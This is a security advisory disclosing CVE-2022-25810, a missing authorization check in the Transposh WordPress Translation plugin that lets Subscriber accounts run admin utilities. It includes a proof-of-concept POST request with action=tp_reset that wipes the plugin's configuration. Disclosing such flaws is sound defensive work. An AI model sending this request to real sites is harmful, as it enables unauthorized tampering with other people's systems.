RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/ Type: Improper Authorization [CWE-285] Date found: 2022-02-21 Date published: 2022-07-22 CVSSv3 Score: 6.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) CVE: CVE-2022-25810 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and below 4. INTRODUCTION =============== Transposh translation filter for WordPress offers a unique approach to blog translation. It allows your blog to combine automatic translation with human translation aided by your users with an easy to use in-context interface. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== Transposh does not properly enforce authorization on functionalities available on the plugin's "Utilities" page leading to unauthorized access for all user roles, including "Subscriber". Some of the affected functionality is: tp_backup - Initiate a new backup tp_reset - Reset the plugin's configuration tp_cleanup - Delete automated translations tp_dedup - Delete duplicates tp_maint - Fix internal errors tp_translate_all - Trigger an auto-translation of all entries 6. PROOF OF CONCEPT =================== An exemplary request to reset the plugin's configuration, send the following request using a "Subscriber" account: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 15 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your cookies] Connection: close action=tp_reset 7. SOLUTION =========== None. Remove the plugin to prevent exploitation. 8. REPORT TIMELINE ================== 2022-02-21: Discovery of the vulnerability 2022-02-21: Contacted the vendor via email 2022-02-21: Vendor response 2022-02-22: CVE requested from WPScan (CNA) 2022-02-23: WPScan assigns CVE-2022-25810 2022-05-22: Sent request for status update on the fix 2022-05-24: Vendor states that there is no update planned so far 2022-07-22: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories